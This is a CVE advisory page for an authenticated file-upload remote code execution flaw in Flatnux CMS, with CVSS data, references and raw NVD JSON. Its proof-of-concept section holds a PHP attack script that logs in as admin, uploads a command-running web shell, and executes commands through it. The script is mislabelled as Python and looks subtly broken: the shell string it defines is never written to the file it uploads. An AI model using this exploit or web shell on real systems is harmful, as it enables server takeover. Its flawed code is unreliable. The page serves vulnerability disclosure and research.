CVE-2023-53956

Description

Flatnux 2021-03.25 contains an authenticated file upload vulnerability that allows administrative users to upload arbitrary PHP files through the file manager. Attackers with admin credentials can upload malicious PHP scripts to the web root directory, enabling remote code execution on the server.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Flatnux CMS <= 2021-03-25

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?php // CVE-2023-53956 PoC - Flatnux Authenticated File Upload RCE // Target: Flatnux CMS <= 2021-03.25 // Author: VulnCheck ([email protected]) $target = "http://target.com/flatnux"; $username = "admin"; $password = "admin123"; // Step 1: Login to get session cookie $login_url = "$target/flatnux.php?mod=users&op=login"; $login_data = http_build_query([ 'user' => $username, 'pass' => $password, 'op' => 'login', 'mod' => 'users' ]); $ch = curl_init($login_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data); curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_exec($ch); curl_close($ch); // Step 2: Upload malicious PHP file via file manager $upload_url = "$target/flatnux.php?mod=filemanager&op=upload"; $php_shell = '<?php system($_GET["cmd"]); ?>'; $post_data = [ 'dir' => 'images', 'file' => new CURLFile('/tmp/shell.php', 'application/x-php', 'shell.php') ]; $ch = curl_init($upload_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data); curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); // Step 3: Execute commands via uploaded shell $shell_url = "$target/images/shell.php?cmd=whoami"; $ch = curl_init($shell_url); curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); curl_close($ch); echo "RCE Result: $result"; ?>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53956
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53956
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53956/
[4] VulDB https://vuldb.com/cve/CVE-2023-53956
[5] http://flatnux.altervista.org/flatnux.html
[6] https://www.exploit-db.com/exploits/51295
[7] https://www.vulncheck.com/advisories/flatnux-authenticated-file-upload-remote-code-execution

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53956", "sourceIdentifier": "[email protected]", "published": "2025-12-19T21:15:51.970", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flatnux 2021-03.25 contains an authenticated file upload vulnerability that allows administrative users to upload arbitrary PHP files through the file manager. Attackers with admin credentials can upload malicious PHP scripts to the web root directory, enabling remote code execution on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "http://flatnux.altervista.org/flatnux.html", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51295", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/flatnux-authenticated-file-upload-remote-code-execution", "source": "[email protected]"}]}}